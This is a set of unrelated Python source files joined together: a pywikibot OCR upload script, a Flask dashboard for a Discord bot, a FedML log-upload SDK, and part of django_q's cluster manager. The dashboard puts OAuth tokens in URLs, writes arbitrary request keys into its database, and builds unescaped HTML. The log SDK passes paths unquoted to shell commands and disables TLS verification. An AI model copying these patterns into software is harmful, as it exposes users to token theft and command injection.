default no OCR is done, i.e. only not-(yet)-existing pages in Page ns will be treated and text will be fetched via preload. If -ocr is provided, default OCR method is: - https://tools.wmflabs.org/phetools If ocr:googleOCR is given, OCR method is: - https://tools.wmflabs.org/ws-google-ocr -threads:n number of threads used to fetch OCR from OCR tools. default is 5; valid only if '-ocr' is selected. -force: overwrite existing pages; default is False; valid only if '-ocr' is selected. -summary: custom edit summary. Use quotes if edit summary contains spaces. -always don't bother asking to confirm any of the changes. """ # # (C) Pywikibot team, 2016-2019 # # Distributed under the terms of the MIT license. # from __future__ import absolute_import, division, unicode_literals import collections import itertools import threading import time import pywikibot from pywikibot import i18n from pywikibot.bot import SingleSiteBot from pywikibot.proofreadpage import IndexPage, ProofreadPage from pywikibot.tools import PY2 if not PY2: import queue else: import Queue as queue # noqa: N813 class UploadTextBot(SingleSiteBot): """ A bot that uploads text-layer to Page:namespace. Text is fetched via preload as on Wikisource wikis, text can be preloaded only if a page does not exist, if an Index page is present. Works only on sites with Proofread Page extension installed. """ def __init__(self, generator, **kwargs): """ Initializer. If OCR is requested, spawns worker threads, and, if no "force" option is set, filter for existing pages. Queues are used for communication to/from threads. A PriorityQueue is used to process pages in the same order as they are generated. @param generator: page generator @type generator: generator """ self.availableOptions.update({ 'showdiff': False, 'force': False, 'ocr': False, 'summary': 'Bot: uploading text', 'threads': 5 }) super(UploadTextBot, self).__init__(**kwargs) self.generator = generator # TODO: create i18 files # Get edit summary message if it's empty. if not self.getOption('summary'): self.options['summary'] = i18n.twtranslate(self.site, 'djvutext-creating') if self.getOption('ocr'): self._num_threads = self.getOption('threads') self._queue_in = queue.Queue() self._queue_out = queue.PriorityQueue() # If not "-force", no reason to get OCR for existing pages # and to process them in Bot.run(). if not self.getOption('force'): self.generator = (p for p in self.generator if not p.exists()) self._spawn_ocr_threads() def _spawn_ocr_threads(self): """Spawn threads for _ocr_worker workers.""" for i in range(self._num_threads): worker = threading.Thread(target=self._ocr_worker) worker.setDaemon(True) worker.start() self._pages = collections.OrderedDict() for idx, p in enumerate(self.generator): self._pages.setdefault(p, idx) self.generator = (p for p in self._pages) # recreate gen for run() for p, idx in self._pages.items(): self._queue_in.put((p, idx)) # idx to preserve order later def _ocr_worker(self): """Fetch OCR content from ocr_tool and queue it.""" while True: page, idx = self._queue_in.get() try: text_body = page.ocr(ocr_tool=self.getOption('ocr')) except ValueError as e: # TODO: is it a problem in PY2? pywikibot.error(str(e)) text_body = None # Sentinel: signal exception to self.treat() self._queue_out.put((idx, text_body)) self._queue_in.task_done() def _get_ocr(self, page): """Get OCR content for page from PriorityQueue.""" # blocks until OCR for expected idx is available expected_idx = self._pages.get(page) while True: if self._queue_out.empty(): time.sleep(0.2) # some pause continue idx, text_body = self._queue_out.queue[0] # peek first element if idx == expected_idx: idx, text_body = self._queue_out.get() return text_body def treat(self, page): """Process one ProofreadPage page. @param page: page to be treated. @type page: ProofreadPage @raises: pywikibot.Error """ if not isinstance(page, ProofreadPage): raise pywikibot.Error('Page {} must be a ProofreadPage object.' .format(page)) summary = self.getOption('summary') if page.exists(): old_text = page.text else: old_text = '' if self.getOption('ocr'): _body = self._get_ocr(page) if _body is None: pywikibot.output('No OCR found. Skipping {}' .format(page.title(as_link=True))) return page.body = _body if (page.exists() and not (self.getOption('ocr') and self.getOption('force'))): pywikibot.output('Page {} already exists, not adding!' .format(page)) else: self.userPut(page, old_text, page.text, summary=summary, show_diff=self.getOption('showdiff')) def main(*args): """ Process command line arguments and invoke bot. If args is an empty list, sys.argv is used. @param args: command line arguments @type args: str """ index = None pages = '1-' options = {} # Parse command line arguments. local_args = pywikibot.handle_args(args) for arg in local_args: arg, sep, value = arg.partition(':') if arg == '-index': index = value elif arg == '-pages': pages = value elif arg == '-showdiff': options['showdiff'] = True elif arg == '-summary': options['summary'] = value elif arg == '-ocr': options['ocr'] = value or 'phetools' elif arg == '-threads': options['threads'] = int(value) elif arg == '-force': options['force'] = True elif arg == '-always': options['always'] = True else: pywikibot.output('Unknown argument ' + arg) # index is mandatory. if not index: pywikibot.bot.suggest_help(missing_parameters=['-index']) return # '-force' can be used with '-ocr' only. if 'force' in options and 'ocr' not in options: pywikibot.error("'-force' can be used with '-ocr' option only.") return site = pywikibot.Site() if not site.has_extension('ProofreadPage'): pywikibot.error('Site {} must have ProofreadPage extension.' .format(site)) return index = IndexPage(site, index) if not index.exists(): pywikibot.error("Page {} doesn't exist.".format(index)) return # Parse pages param. # Create a list of (start, end) tuples. pages = pages.split(',') for interval in range(len(pages)): start, sep, end = pages[interval].partition('-') start = 1 if not start else int(start) if not sep: end = start else: end = int(end) if end else index.num_pages pages[interval] = (start, end) # gen yields ProofreadPage objects. gen_list = [] for start, end in sorted(pages): gen = index.page_gen(start=start, end=end, filter_ql=[1], content=True) gen_list.append(gen) gen = itertools.chain(*gen_list) pywikibot.output('\nUploading text to {}\n' .format(index.title(as_link=True))) bot = UploadTextBot(gen, site=index.site, **options) bot.run() if __name__ == '__main__': try: main() except Exception: pywikibot.error('Fatal error:', exc_info=True)
server.py
from flask import Flask from threading import Thread from flask import send_file, send_from_directory, safe_join, abort, g, session, redirect, request, url_for, jsonify, render_template import os import random import requests import json import string app = Flask('') import discord from replit import db import logging log = logging.getLogger('werkzeug') log.setLevel(logging.ERROR) client = None def setClient(bot): global client client = bot def get_random_string(length): letters = string.ascii_letters result_str = ''.join(random.choice(letters) for i in range(length)) return result_str @app.route('/') def main(): style = render_template('style.css') homePage = render_template('home.html') return homePage.format(style=style, bs='{', bl='}') @app.route('/invite') def invite(): #https://discord.com/oauth2/authorize?client_id=734526487994171392&permissions=8&scope=bot return """<meta http-equiv="Refresh" content="0; url='https://discord.com/oauth2/authorize?client_id=734526487994171392&permissions=8&scope=bot'" />""" @app.route('/loadstaff') def loadStaff(): javascript = render_template('loadStaff.js') style = render_template('style.css') homePage = render_template('load.html') return homePage.format(style=style, javascript=javascript) @app.route('/fetchuser') def fetchuser(): user = request.args.get('id') if user == None: return 'null' person = client.get_user(int(user)) userDict = {"tag": str(person), "pfp": str(person.avatar_url)} from flask import jsonify return str(userDict) @app.route('/staff') def staffPage(): staff = ["368071242189897728", "373863238816759819", "549268263289487431", "703282236279226408", "741554642063982692"] #^ coolo2, holy cat, kemosaf, chopstix, and UpbeatErmine493 token = request.args.get('token') key = request.args.get('key') value = request.args.get('value') if token == None or token == 'null': return """<meta http-equiv="Refresh" content="0; url='https://discord.com/api/oauth2/authorize?client_id=776729260647907379&redirect_uri=https%3A%2F%2Fdonut.js.org%2Floadstaff&response_type=token&scope=identify%20guilds&prompt=none'" />""" else: person = requests.get('https://discord.com/api/users/@me', headers={"Authorization" : f"Bearer {token}"}) if person.status_code == 401: return """<meta http-equiv="Refresh" content="0; url='https://discord.com/api/oauth2/authorize?client_id=776729260647907379&redirect_uri=https%3A%2F%2Fdonut.js.org%2Floadstaff&response_type=token&scope=identify%20guilds'" />""" person = json.loads(person.text) id = person['id'] if id in staff: ##^the firewall^## if(key != None and value != None): if(key == 'blacklists'): blacklists = db['blacklists'] if value in blacklists: blacklists.remove(value) else: blacklists.append(value) db[f'blacklists'] = blacklists return 'data entered the database successfully and firewall allowed access' else: db[f'{key}'] = value if person['avatar'] == None: userAv = 'https://www.attornify.com/assets/builds/images/no_avatar.jpg' else: userAv = f"https://cdn.discordapp.com/avatars/{person['id']}/{person['avatar']}.webp?size=4096" allServers = '' for element in client.guilds: if element.icon_url == None: serverAv = 'https://intersections.humanities.ufl.edu/wp-content/uploads/2020/07/112815904-stock-vector-no-image-available-icon-flat-vector-illustration-1.jpg' else: serverAv = element.icon_url server = client.get_guild(int(element.id)) code = get_random_string(6) db[f"dashboard_{element.id}_{person['id']}"] = code allServers += f""" <div class="item"> <div class="float"> <img width=100%; src='{serverAv}'><br> <p style='font-size:15px'><b>{element.name}</b></p><p style='font-size:10px'>ID: {element.id}</p><a href='/render#server={element.id}&user={person['id']}&tag={person['username']}%23{person['discriminator']}&code={code}&token={token}&type=staff'><p><button style='cursor: pointer; background-color:#ff4085'>View Dashboard</button></p></a> </div> </div> """ style = render_template('style.css') staffWeb = render_template('staff.html') return staffWeb.format(style=style, userAv=userAv, userusername=person['username'], userdiscriminator=person['discriminator'], allServers=allServers, bs='{', bl='}', suggestions=db['suggestions'], issues=db['issues'], token=token, blacklists=db['blacklists']) else: page = render_template('notStaff.html') style = render_template('style.css') return page.format(style=style) return "You aren't part of the staff team! " @app.route('/dashboard') def dashboard(): return """<meta http-equiv="Refresh" content="0; url='https://discord.com/oauth2/authorize?client_id=776729260647907379&redirect_uri=https%3A%2F%2Fdonut.js.org%2Fload&response_type=token&scope=identify%20guilds&prompt=none'" />""" @app.route('/levels') def levels(): users = db.prefix(f"level_") userArray = [] levels = '' i = 0 if len(users) > 0: for element in users: userLvl = db[element] userID = element.replace(f"level_", "") userArray.append({"user": f'{userID}', "lvl": userLvl}) def get_my_key(obj): return obj['lvl'] userArray.sort(key=get_my_key) userArray.reverse() for element in userArray: person = client.get_user(int(element["user"])) i += 1 xp = element['lvl'] nextInt = int(xp/1000+1) * 1000 leftNext = nextInt - xp thisLevelXp = 1000 - leftNext if(client.get_user(int(element['user'])) != None): person = client.get_user(int(element['user'])).name + '%23____' member = client.get_user(int(element['user'])) try: xpcolor = db[f'cardXp_{element["user"]}'] except: xpcolor = 'ff4085' try: bgcolor = db[f'cardBg_{element["user"]}'] except: bgcolor = None levels += f''' <center> <img width=800 src='https://vacefron.nl/api/rankcard?username={person}&avatar={client.get_user(int(element['user'])).avatar_url}&level={int(xp/1000)}+++++++++++++Rank+{i}&rank=&currentxp={thisLevelXp}&nextlevelxp=1000&previouslevelxp=0&custombg={bgcolor}&xpcolor={xpcolor}&isboosting=false'> </center> <br><br><br><br> ''' page = render_template('levels.html') style = render_template('style.css') return page.format(style=style, levels=levels) @app.route('/server') def dashboardPage(): req = request.args.get('type') user = request.args.get('user') server = request.args.get('server') code = request.args.get('code') token = request.args.get('token') key = request.args.get('key') value = request.args.get('value') try: dbCode = db[f"dashboard_{server}_{user}"] except: dbCode = os.getenv("PASSWORD") try: prefix = db[f"prefix_{server}"] except: prefix = '?' try: currency = db[f"currency_{server}"] except: currency = 'coins' try: defaultColor = str(db[f"color_{server}"].replace('0x', '#')) except: defaultColor = '#ff4085' try: deleteID = db[f"deleteChannel_{server}"] deleteChannel = client.get_channel(int(deleteID)); check = 'checked' except: deleteChannel = 'None' deleteID = 'None' check = '' try: editID = db[f"editChannel_{server}"] editChannel = client.get_channel(int(editID)); check = 'checked' except: editChannel = 'None' editID = 'None' check = '' try: leaveID = db[f"leaveChannel_{server}"] leaveChannel = client.get_channel(int(leaveID)); check = 'checked' except: leaveChannel = 'None' leaveID = 'None' check = '' try: leaveMessage = db[f"leaveMessage_{server}"] except: leaveMessage = 'None' try: joinID = db[f"joinChannel_{server}"] joinChannel = client.get_channel(int(joinID)); check = 'checked' except: joinChannel = 'None' joinID = 'None' check = '' try: joinMessage = db[f"joinMessage_{server}"] except: joinMessage = 'None' if str(code) == str(dbCode): if key != None and value != None: db[f"{key}_{server}"] = str(value) bs = '{' bl = '}' guildObj = client.get_guild(int(server)) if guildObj.icon == None: serverAv = 'https://intersections.humanities.ufl.edu/wp-content/uploads/2020/07/112815904-stock-vector-no-image-available-icon-flat-vector-illustration-1.jpg' else: serverAv = f'https://cdn.discordapp.com/icons/{server}/{guildObj.icon}.webp?size=4096' channels = '' for element in guildObj.channels: if str(element.type) == 'text' or str(element.type) == 'news': channels += f'<option value="{element.id}">#{element.name}</option>\n' if req == 'staff': nav = """ <a href="/">Home</a> <a href="/dashboard">Dashboard</a> <a href="/levels">Levels</a> <a href="/commands">Commands</a> <a style='background-color:white;' href="/staff">Staff</a> <a href="/about">About</a> """ redirect = 'loadstaff' else: nav = """ <a href="/">Home</a> <a style='background-color:white;' href="/dashboard">Dashboard</a> <a href="/levels">Levels</a> <a href="/commands">Commands</a> <a href="/staff">Staff</a> <a href="/about">About</a> """ redirect = 'load' style = render_template('style.css') html = render_template('server.html') return html.format(style=style, defaultColor=defaultColor, channels=channels, bs='{', bl='}', serverAv=serverAv, joinChannel=joinChannel, joinID=joinID, joinMessage=joinMessage, leaveChannel=leaveChannel, leaveID=leaveID, leaveMessage=leaveMessage, editChannel=editChannel, editID=editID, deleteChannel=deleteChannel, deleteID=deleteID, prefix=prefix, token=token, guildObj=guildObj, lenguildObjmembers=len(guildObj.members), guildBirthday=guildObj.created_at.strftime('%a, %#d, %B, %Y, %I :%M %p UTC'), server=server, user=user, code=code, nav=nav, redirect=redirect, currency=currency) else: return "fail" @app.route('/test') def test(): token = request.args.get('token') user = requests.get('https://discord.com/api/users/@me', headers={"Authorization" : f"Bearer {token}"}) return str(user.status_code) @app.route('/profile') def profile(): guildList = '' noDonut = '' noPerms = '' name = request.args.get('name') value = request.args.get('value') token = request.args.get('token') user = requests.get('https://discord.com/api/users/@me', headers={"Authorization" : f"Bearer {token}"}) if user.status_code == 401: return """<meta http-equiv="Refresh" content="0; url='https://discord.com/api/oauth2/authorize?client_id=776729260647907379&redirect_uri=https%3A%2F%2Fdonut.js.org%2Fload&response_type=token&scope=identify%20guilds'" />""" user = json.loads(user.text) guilds = requests.get('https://discord.com/api/users/@me/guilds', headers={"Authorization" : f"Bearer {token}"}) guilds = guilds.json() try: xp = db[f"level_{user['id']}"] except: xp = 0 nextInt = int(xp/1000+1) * 1000; leftNext = nextInt - xp; thisLevelXp = 1000 - leftNext if token == None or token == 'null': return """<meta http-equiv="Refresh" content="0; url='https://discord.com/api/oauth2/authorize?client_id=776729260647907379&redirect_uri=https%3A%2F%2Fdonut.js.org%2Fload&response_type=token&scope=identify%20guilds'" />""" if name != None and value != None: db[f'{name}_{user["id"]}'] = value return "Set!" try: xpcolor = db[f'cardXp_{user["id"]}'] except: xpcolor = 'ff4085' try: bgcolor = db[f'cardBg_{user["id"]}'] except: bgcolor = None for element in guilds: try: guildObj = client.get_guild(int(element['id'])) except: guildObj = None perms = str(element['permissions']) perms = [char for char in perms] if len(perms) > 9: perms = perms[9] else: perms = None if guildObj != None and perms == '7': #7 indicated that the user has admin in that server sikk #if guildObj is basically checking that the bot is in the guild and it rtuerned something not None code = get_random_string(6) db[f"dashboard_{element['id']}_{user['id']}"] = code if element['icon'] == None: serverAv = 'https://intersections.humanities.ufl.edu/wp-content/uploads/2020/07/112815904-stock-vector-no-image-available-icon-flat-vector-illustration-1.jpg' else: serverAv = f'https://cdn.discordapp.com/icons/{element["id"]}/{element["icon"]}.webp?size=4096' guildList = guildList + f""" <div class="item"> <div class="float"> <img width=100%; src='{serverAv}'><br> <p style='font-size:15px'><b>{element['name']}</b></p><a href='/render#server={element['id']}&user={user['id']}&tag={user['username']}%23{user['discriminator']}&code={code}&token={token}&type=user'><p><button style='cursor: pointer; background-color:#ff4085'>View Dashboard</button></p></a> </div> </div> """ if guildObj == None and perms == '7': if element['icon'] == None: serverAv = 'https://intersections.humanities.ufl.edu/wp-content/uploads/2020/07/112815904-stock-vector-no-image-available-icon-flat-vector-illustration-1.jpg' else: serverAv = f'https://cdn.discordapp.com/icons/{element["id"]}/{element["icon"]}.webp?size=4096' noDonut = noDonut + f""" <div class="item"> <div class="float"> <img width=100%; src='{serverAv}'><br> <p style='font-size:15px'><b>{element['name']}</b></p><a href='https://discord.com/api/oauth2/authorize?client_id=734526487994171392&permissions=8&scope=bot&guild_id={element['id']}'><p><button style='background-color:gray; cursor: pointer;'>Invite Me</button></p></a> </div> </div> """ if guildObj != None and perms != '7': if element['icon'] == None: serverAv = 'https://intersections.humanities.ufl.edu/wp-content/uploads/2020/07/112815904-stock-vector-no-image-available-icon-flat-vector-illustration-1.jpg' else: serverAv = f'https://cdn.discordapp.com/icons/{element["id"]}/{element["icon"]}.webp?size=4096' noPerms = noPerms + f""" <div class="item"> <div class="float"> <img width=100%; src='{serverAv}'><br> <p style='font-size:15px'><b>{element['name']}</b></p><a><p><button style='background-color:red; cursor: no-drop;'>No Permissions</button></p></a> </div> </div> """ if user['avatar'] == None: userAv = 'https://www.attornify.com/assets/builds/images/no_avatar.jpg' else: userAv = f"https://cdn.discordapp.com/avatars/{user['id']}/{user['avatar']}.webp?size=4096" style = render_template('style.css') profilePage = render_template('profile.html') #f"https://vacefron.nl/api/rankcard?username={str(member).replace('#', '%23')}&avatar={member.avatar_url}&level={int(xp/100)}&rank=&currentxp={thisLevelXp}&nextlevelxp=1000&previouslevelxp=0&custombg=none&xpcolor=ff4085&isboosting=false" return profilePage.format(style=style, userAv=userAv, userusername=user['username'], userdiscriminator=user['discriminator'], userlocale=user['locale'], userid=user['id'], guildList=guildList, noPerms=noPerms, noDonut=noDonut, bs='{', bl='}', levelTag=f"{user['username']}%23{user['discriminator']}", level=int(xp/1000), thisLevelXp=thisLevelXp, token=token, xpcolor=xpcolor, bgcolor=bgcolor) @app.route('/render') def render(): javascript = render_template('guildrender.js') style = render_template('style.css') page = render_template('load.html') return page.format(style=style, javascript=javascript) @app.route('/load') def load(): javascript = render_template('render.js') style = render_template('style.css') homePage = render_template('load.html') return homePage.format(style=style, javascript=javascript) @app.route('/about') def about(): style = render_template('style.css') page = render_template('about.html') return page.format(style=style) @app.route('/commands') def commands(): style = render_template('style.css') page = render_template('commands.html') return page.format(style=style) @app.errorhandler(404) def page_not_found(e): notFound = render_template('notFound.html') style = render_template('style.css') return notFound.format(style=style) def run(): app.run(host="0.0.0.0", port=8080) def online(client): server = Thread(target=run) server.start() #oauth2 link: https://discord.com/api/oauth2/authorize?client_id=776729260647907379&redirect_uri=https%3A%2F%2Fdonut.js.org%2Fload&response_type=token&scope=identify%20guilds
FedLogsSDK.py
import logging import multiprocessing import os import sys import json import threading import time import requests import yaml sys.path.insert(0, os.path.abspath(os.path.join(os.getcwd(), "../../../"))) sys.path.insert(0, os.path.abspath(os.path.join(os.getcwd(), "../../../../FedML"))) class FedLogsSDK: FED_LOG_LINE_NUMS_PER_UPLOADING = 100 _log_sdk_instance = None _instance_lock = threading.Lock() def __new__(cls, *args, **kwargs): if not hasattr(FedLogsSDK, "_instance"): with FedLogsSDK._instance_lock: if not hasattr(FedLogsSDK, "_instance"): FedLogsSDK._instance = object.__new__(cls) return FedLogsSDK._instance def __init__(self, args): self.args = args self.should_write_log_file = True self.should_upload_log_file = True self.log_file_dir = args.log_file_dir self.log_file = None self.run_id = args.run_id if args.silo_rank == 0: self.edge_id = 0 else: self.edge_id = json.loads(args.client_ids)[0] if args.log_server_url is None or args.log_server_url == "": self.log_server_url ="https://open.fedml.ai/fedmlOpsServer/logs/update" else: self.log_server_url = args.log_server_url self.log_line_index = 0 self.log_config_file = args.log_file_dir + "/log-config.yaml" self.log_config = {} self.load_log_config() self.origin_log_file_path = self.log_file_dir + "/fedavg-cross-silo-run-" + str(self.run_id) + \ "-edge-" + str(self.edge_id) + ".log" self.log_file_path = self.log_file_dir + "/fedavg-cross-silo-run-" + str(self.run_id) + \ "-edge-" + str(self.edge_id) + "-upload.log" if self.should_upload_log_file: multiprocessing.Process(target=self.log_thread).start() @staticmethod def get_instance(args): if FedLogsSDK._log_sdk_instance is None: FedLogsSDK._log_sdk_instance = FedLogsSDK(args) return FedLogsSDK._log_sdk_instance def init_logs(self): log_file_path, program_prefix = FedLogsSDK.build_log_file_path(self.args) if self.should_write_log_file: logging.basicConfig( filename=log_file_path, filemode="w", level=logging.INFO, format=program_prefix + " - %(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s", datefmt="%a, %d %b %Y %H:%M:%S", ) else: logging.basicConfig( level=logging.INFO, format=program_prefix + " - %(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s", datefmt="%a, %d %b %Y %H:%M:%S", ) @staticmethod def build_log_file_path(args): if args.silo_rank == 0: edge_id = 0 program_prefix = "FedML-Server({}) @device-id-{}".format(args.silo_rank, edge_id) else: edge_id = json.loads(args.client_ids)[0] program_prefix = "FedML-Client({rank}) @device-id-{edge}".format(rank=args.silo_rank, edge=edge_id) os.system("mkdir -p " + args.log_file_dir) client_ids = json.loads(args.client_ids) log_file_path = args.log_file_dir + "/fedavg-cross-silo-run-" + str(args.run_id) + \ "-edge-" + str(edge_id) + ".log" return log_file_path, program_prefix def log_upload(self, run_id, edge_id): # read log data from local log file log_lines = self.log_read() if log_lines is None or len(log_lines) <= 0: return self.log_line_index += len(log_lines) log_upload_request = {"run_id": run_id, "edge_id": edge_id, "logs": log_lines, "create_time": time.time(), "update_time": time.time(), "created_by": str(edge_id), "updated_by": str(edge_id)} # set request header with the application/json format log_headers = {'Content-Type': 'application/json'} # send log data to the log server response = requests.post(self.log_server_url, headers=log_headers, json=log_upload_request, verify=False) if response.status_code != 200: # print('Error for sending log data: ' + str(response.status_code)) self.log_line_index -= len(log_lines) else: resp_data = response.json() # print('The result for sending log data: code %s, content %s' % # (str(response.status_code), str(resp_data))) def log_thread(self): while True: time.sleep(10) self.log_upload(self.run_id, self.edge_id) def log_relocation(self): log_line_count = self.log_line_index while log_line_count > 0: self.log_file.readline() log_line_count -= 1 def log_open(self): try: os.system("cp -f " + self.origin_log_file_path + " " + self.log_file_path) if self.log_file is None: self.log_file = open(self.log_file_path, "r") self.log_relocation() except Exception as e: # print("exception at open log file.") pass def log_read(self): self.log_open() if self.log_file is None: return None line_count = 0 log_lines = [] while True: line_count += 1 log_line = self.log_file.readline() if not log_line: break log_lines.append(log_line) self.log_file.close() self.log_file = None return log_lines @staticmethod def __generate_yaml_doc(log_config_object, yaml_file): try: file = open(yaml_file, 'w', encoding='utf-8') yaml.dump(log_config_object, file) file.close() except Exception as e: # print("Generate yaml file.") pass @staticmethod def __load_yaml_config(yaml_path): """Helper function to load a yaml config file""" with open(yaml_path, "r") as stream: try: return yaml.safe_load(stream) except yaml.YAMLError as exc: raise ValueError("Yaml error - check yaml file") def load_log_config(self): try: self.log_config = self.__load_yaml_config(self.log_config_file) self.log_line_index = self.log_config["log_config"]["log_line_index"] except Exception as e: # print("load_log_config exception") pass
cluster.py
# Standard import ast import inspect import pydoc import signal import socket import traceback import uuid from datetime import datetime from multiprocessing import Event, Process, Value, current_process from time import sleep # External import arrow # Django from django import core, db from django.apps.registry import apps try: apps.check_apps_ready() except core.exceptions.AppRegistryNotReady: import django django.setup() from django.conf import settings from django.utils import timezone from django.utils.translation import gettext_lazy as _ # Local import django_q.tasks from django_q.brokers import Broker, get_broker from django_q.conf import ( Conf, croniter, error_reporter, get_ppid, logger, psutil, resource, ) from django_q.humanhash import humanize from django_q.models import Schedule, Success, Task from django_q.queues import Queue from django_q.signals import post_execute, pre_execute from django_q.signing import BadSignature, SignedPackage from django_q.status import Stat, Status class Cluster: def __init__(self, broker: Broker = None): self.broker = broker or get_broker() self.sentinel = None self.stop_event = None self.start_event = None self.pid = current_process().pid self.cluster_id = uuid.uuid4() self.host = socket.gethostname() self.timeout = Conf.TIMEOUT signal.signal(signal.SIGTERM, self.sig_handler) signal.signal(signal.SIGINT, self.sig_handler) def start(self) -> int: # Start Sentinel self.stop_event = Event() self.start_event = Event() self.sentinel = Process( target=Sentinel, args=( self.stop_event, self.start_event, self.cluster_id, self.broker, self.timeout, ), ) self.sentinel.start() logger.info(_(f"Q Cluster {self.name} starting.")) while not self.start_event.is_set(): sleep(0.1) return self.pid def stop(self) -> bool: if not self.sentinel.is_alive(): return False logger.info(_(f"Q Cluster {self.name} stopping.")) self.stop_event.set() self.sentinel.join() logger.info(_(f"Q Cluster {self.name} has stopped.")) self.start_event = None self.stop_event = None return True def sig_handler(self, signum, frame): logger.debug( _( f'{current_process().name} got signal {Conf.SIGNAL_NAMES.get(signum, "UNKNOWN")}' ) ) self.stop() @property def stat(self) -> Status: if self.sentinel: return Stat.get(pid=self.pid, cluster_id=self.cluster_id) return Status(pid=self.pid, cluster_id=self.cluster_id) @property def name(self) -> str: return humanize(self.cluster_id.hex) @property def is_starting(self) -> bool: return self.stop_event and self.start_event and not self.start_event.is_set() @property def is_running(self) -> bool: return self.stop_event and self.start_event and self.start_event.is_set() @property def is_stopping(self) -> bool: return ( self.stop_event and self.start_event and self.start_event.is_set() and self.stop_event.is_set() ) @property def has_stopped(self) -> bool: return self.start_event is None and self.stop_event is None and self.sentinel class Sentinel: def __init__( self, stop_event, start_event, cluster_id, broker=None, timeout=Conf.TIMEOUT, start=True, ): # Make sure we catch signals for the pool signal.signal(signal.SIGINT, signal.SIG_IGN) signal.signal(signal.SIGTERM, signal.SIG_DFL) self.pid = current_process().pid self.cluster_id = cluster_id self.parent_pid = get_ppid() self.name = current_process().name self.broker = broker or get_broker() self.reincarnations = 0 self.tob = timezone.now() self.stop_event = stop_event self.start_event = start_event self.pool_size = Conf.WORKERS self.pool = [] self.timeout = timeout self.task_queue = ( Queue(maxsize=Conf.QUEUE_LIMIT) if Conf.QUEUE_LIMIT else Queue() ) self.result_queue = Queue() self.event_out = Event() self.monitor = None self.pusher = None if start: self.start() def start(self): self.broker.ping() self.spawn_cluster() self.guard() def status(self) -> str: if not self.start_event.is_set() and not self.stop_event.is_set(): return Conf.STARTING elif self.start_event.is_set() and not self.stop_event.is_set(): if self.result_queue.empty() and self.task_queue.empty(): return Conf.IDLE return Conf.WORKING elif self.stop_event.is_set() and self.start_event.is_set(): if self.monitor.is_alive() or self.pusher.is_alive() or len(self.pool) > 0: return Conf.STOPPING return Conf.STOPPED def spawn_process(self, target, *args) -> Process: """ :type target: function or class """ p = Process(target=target, args=args) p.daemon = True if target == worker: p.daemon = Conf.DAEMONIZE_WORKERS p.timer = args[2] self.pool.append(p) p.start() return p def spawn_pusher(self) -> Process: return self.spawn_process(pusher, self.task_queue, self.event_out, self.broker) def spawn_worker(self): self.spawn_process( worker, self.task_queue, self.result_queue, Value("f", -1), self.timeout ) def spawn_monitor(self) -> Process: return self.spawn_process(monitor, self.result_queue, self.broker) def reincarnate(self, process): """ :param process: the process to reincarnate :type process: Process or None """ if not Conf.SYNC: db.connections.close_all() # Close any old connections if process == self.monitor: self.monitor = self.spawn_monitor() logger.error(_(f"reincarnated monitor {process.name} after sudden death")) elif process == self.pusher: self.pusher = self.spawn_pusher() logger.error(_(f"reincarnated pusher {process.name} after sudden death")) else: self.pool.remove(process) self.spawn_worker() if process.timer.value == 0: # only need to terminate on timeout, otherwise we risk destabilizing the queues process.terminate() logger.warning(_(f"reincarnated worker {process.name} after timeout")) elif int(process.timer.value) == -2: logger.info(_(f"recycled worker {process.name}")) else: logger.error(_(f"reincarnated worker {process.name} after death")) self.reincarnations += 1 def spawn_cluster(self): self.pool = [] Stat(self).save() if not Conf.SYNC: db.connection.close() # spawn worker pool for __ in range(self.pool_size): self.spawn_worker() # spawn auxiliary self.monitor = self.spawn_monitor() self.pusher = self.spawn_pusher() # set worker cpu affinity if needed if psutil and Conf.CPU_AFFINITY: set_cpu_affinity(Conf.CPU_AFFINITY, [w.pid for w in self.pool]) def guard(self): logger.info( _( f"{current_process().name} guarding cluster {humanize(self.cluster_id.hex)}" ) ) self.start_event.set() Stat(self).save() logger.info(_(f"Q Cluster {humanize(self.cluster_id.hex)} running.")) counter = 0 cycle = Conf.GUARD_CYCLE # guard loop sleep in seconds # Guard loop. Runs at least once while not self.stop_event.is_set() or not counter: # Check Workers for p in self.pool: with p.timer.get_lock(): # Are you alive? if not p.is_alive() or p.timer.value == 0: self.reincarnate(p) continue # Decrement timer if work is being done if p.timer.value > 0: p.timer.value -= cycle # Check Monitor if not self.monitor.is_alive(): self.reincarnate(self.monitor) # Check Pusher if not self.pusher.is_alive(): self.reincarnate(self.pusher) # Call scheduler once a minute (or so) counter += cycle if counter >= 30 and Conf.SCHEDULER: counter = 0 scheduler(broker=self.broker) # Save current status Stat(self).save() sleep(cycle) self.stop() def stop(self): Stat(self).save() name = current_process().name logger.info(_(f"{name} stopping cluster processes")) # Stopping pusher self.event_out.set() # Wait for it to stop while self.pusher.is_alive(): sleep(0.1) Stat(self).save() # Put poison pills in the queue for __ in range(len(self.pool)): self.task_queue.put("STOP") self.task_queue.close() # wait for the task queue to empty self.task_queue.join_thread() # Wait for all the workers to exit while len(self.pool): for p in self.pool: if not p.is_alive(): self.pool.remove(p) sleep(0.1) Stat(self).save() # Finally stop the monitor self.result_queue.put("STOP") self.result_queue.close() # Wait for the result queue to empty self.result_queue.join_thread() logger.info(_(f"{name} waiting for the monitor.")) # Wait for everything to close or time out count = 0 if not self.timeout: self.timeout = 30 while self.status() == Conf.STOPPING and count < self.timeout * 10: sleep(0.1) Stat(self).save() count += 1 # Final status Stat(self).save() def pusher(task_queue: Queue, event: Event, broker: Broker = None): """ Pulls tasks of the broker and puts them in the task queue :type broker: :type task_queue: multiprocessing.Queue :type event: multiprocessing.Event """ if not broker: broker = get_broker() logger.info(_(f"{current_process().name} pushing tasks at {current_process().pid}")) while True: try: task_set = broker.dequeue() except Exception as e: logger.error(e, traceback.format_exc()) # broker probably crashed. Let the sentinel handle it. sleep(10) break if task_set: for task in task_set: ack_id = task[0] # unpack the task try: task = SignedPackage.loads(task[1]) except (TypeError, BadSignature) as e: logger.error(e, traceback.format_exc()) broker.fail(ack_id) continue task["ack_id"] = ack_id task_queue.put(task) logger.debug(_(f"queueing from {broker.list_key}")) if event.is_set(): break logger.info(_(f"{current_process().name} stopped pushing tasks")) def monitor(result_queue: Queue, broker: Broker = None): """ Gets finished tasks from the result queue and saves them to Django :type broker: brokers.Broker :type result_queue: multiprocessing.Queue """ if not broker: broker = get_broker() name = current_process().name logger.info(_(f"{name} monitoring at {current_process().pid}")) for task in iter(result_queue.get, "STOP"): # save the result if task.get("cached", False): save_cached(task, broker) else: save_task(task, broker) # acknowledge result ack_id = task.pop("ack_id", False) if ack_id and (task["success"] or task.get("ack_failure", False)): 